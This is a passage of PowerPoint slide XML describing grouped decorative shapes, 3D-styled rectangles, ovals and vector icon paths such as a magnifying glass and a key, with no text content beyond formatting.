                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
